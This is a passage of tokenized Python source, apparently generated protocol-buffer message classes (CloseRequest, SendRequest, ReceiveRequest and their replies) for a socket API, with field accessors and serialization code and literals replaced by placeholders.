ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CloseRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_send_offset_ = <NUM_LIT:0> <EOL> send_offset_ = - <NUM_LIT:1> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . 
socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def send_offset ( self ) : return self . send_offset_ <EOL> def set_send_offset ( self , x ) : <EOL> self . has_send_offset_ = <NUM_LIT:1> <EOL> self . send_offset_ = x <EOL> def clear_send_offset ( self ) : <EOL> if self . has_send_offset_ : <EOL> self . has_send_offset_ = <NUM_LIT:0> <EOL> self . send_offset_ = - <NUM_LIT:1> <EOL> def has_send_offset ( self ) : return self . has_send_offset_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_send_offset ( ) ) : self . set_send_offset ( x . send_offset ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ != x . has_send_offset_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ and self . send_offset_ != x . send_offset_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . 
has_send_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_send_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_send_offset ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_send_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_send_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . 
send_offset_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> ksend_offset = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CloseReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . 
skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SendRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_data_ = <NUM_LIT:0> <EOL> data_ = "<STR_LIT>" <EOL> has_stream_offset_ = <NUM_LIT:0> <EOL> stream_offset_ = <NUM_LIT:0> <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_send_to_ = <NUM_LIT:0> <EOL> send_to_ = None <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def data ( self ) : return self . data_ <EOL> def set_data ( self , x ) : <EOL> self . has_data_ = <NUM_LIT:1> <EOL> self . data_ = x <EOL> def clear_data ( self ) : <EOL> if self . 
has_data_ : <EOL> self . has_data_ = <NUM_LIT:0> <EOL> self . data_ = "<STR_LIT>" <EOL> def has_data ( self ) : return self . has_data_ <EOL> def stream_offset ( self ) : return self . stream_offset_ <EOL> def set_stream_offset ( self , x ) : <EOL> self . has_stream_offset_ = <NUM_LIT:1> <EOL> self . stream_offset_ = x <EOL> def clear_stream_offset ( self ) : <EOL> if self . has_stream_offset_ : <EOL> self . has_stream_offset_ = <NUM_LIT:0> <EOL> self . stream_offset_ = <NUM_LIT:0> <EOL> def has_stream_offset ( self ) : return self . has_stream_offset_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def send_to ( self ) : <EOL> if self . send_to_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . send_to_ is None : self . send_to_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . send_to_ <EOL> def mutable_send_to ( self ) : self . has_send_to_ = <NUM_LIT:1> ; return self . send_to ( ) <EOL> def clear_send_to ( self ) : <EOL> if self . has_send_to_ : <EOL> self . has_send_to_ = <NUM_LIT:0> ; <EOL> if self . send_to_ is not None : self . send_to_ . Clear ( ) <EOL> def has_send_to ( self ) : return self . has_send_to_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . 
has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_data ( ) ) : self . set_data ( x . data ( ) ) <EOL> if ( x . has_stream_offset ( ) ) : self . set_stream_offset ( x . stream_offset ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_send_to ( ) ) : self . mutable_send_to ( ) . MergeFrom ( x . send_to ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_data_ != x . has_data_ : return <NUM_LIT:0> <EOL> if self . has_data_ and self . data_ != x . data_ : return <NUM_LIT:0> <EOL> if self . has_stream_offset_ != x . has_stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_stream_offset_ and self . stream_offset_ != x . stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_send_to_ != x . has_send_to_ : return <NUM_LIT:0> <EOL> if self . has_send_to_ and self . send_to_ != x . send_to_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . 
has_data_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_stream_offset_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( self . has_send_to_ and not self . send_to_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthString ( len ( self . data_ ) ) <EOL> n += self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : n += <NUM_LIT:1> + self . lengthString ( self . send_to_ . ByteSize ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_data_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . data_ ) ) <EOL> if ( self . has_stream_offset_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : n += <NUM_LIT:1> + self . lengthString ( self . send_to_ . ByteSizePartial ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_data ( ) <EOL> self . clear_stream_offset ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_send_to ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . 
putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . send_to_ . ByteSize ( ) ) <EOL> self . send_to_ . OutputUnchecked ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_data_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> if ( self . has_stream_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_send_to_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . send_to_ . ByteSizePartial ( ) ) <EOL> self . send_to_ . OutputPartial ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_data ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_stream_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_flags ( d . 
getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_send_to ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_data_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . data_ ) ) <EOL> if self . has_stream_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . stream_offset_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . flags_ ) ) <EOL> if self . has_send_to_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . send_to_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kdata = <NUM_LIT:2> <EOL> kstream_offset = <NUM_LIT:3> <EOL> kflags = <NUM_LIT:4> <EOL> ksend_to = <NUM_LIT:5> <EOL> ktimeout_seconds = <NUM_LIT:6> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:data>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> } , <NUM_LIT:6> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:6> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SendReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_data_sent_ = <NUM_LIT:0> <EOL> data_sent_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def data_sent ( self ) : return self . data_sent_ <EOL> def set_data_sent ( self , x ) : <EOL> self . has_data_sent_ = <NUM_LIT:1> <EOL> self . data_sent_ = x <EOL> def clear_data_sent ( self ) : <EOL> if self . has_data_sent_ : <EOL> self . has_data_sent_ = <NUM_LIT:0> <EOL> self . data_sent_ = <NUM_LIT:0> <EOL> def has_data_sent ( self ) : return self . has_data_sent_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_data_sent ( ) ) : self . set_data_sent ( x . 
data_sent ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_data_sent_ != x . has_data_sent_ : return <NUM_LIT:0> <EOL> if self . has_data_sent_ and self . data_sent_ != x . data_sent_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_data_sent_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . data_sent_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_data_sent_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . data_sent_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_data_sent ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_data_sent_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . data_sent_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_data_sent_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . data_sent_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_data_sent ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_data_sent_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . data_sent_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kdata_sent = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ReceiveRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> MSG_OOB = <NUM_LIT:1> <EOL> MSG_PEEK = <NUM_LIT:2> <EOL> _Flags_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def Flags_Name ( cls , x ) : return cls . _Flags_NAMES . get ( x , "<STR_LIT>" ) <EOL> Flags_Name = classmethod ( Flags_Name ) <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_data_size_ = <NUM_LIT:0> <EOL> data_size_ = <NUM_LIT:0> <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def data_size ( self ) : return self . data_size_ <EOL> def set_data_size ( self , x ) : <EOL> self . has_data_size_ = <NUM_LIT:1> <EOL> self . 
data_size_ = x <EOL> def clear_data_size ( self ) : <EOL> if self . has_data_size_ : <EOL> self . has_data_size_ = <NUM_LIT:0> <EOL> self . data_size_ = <NUM_LIT:0> <EOL> def has_data_size ( self ) : return self . has_data_size_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_data_size ( ) ) : self . set_data_size ( x . data_size ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . 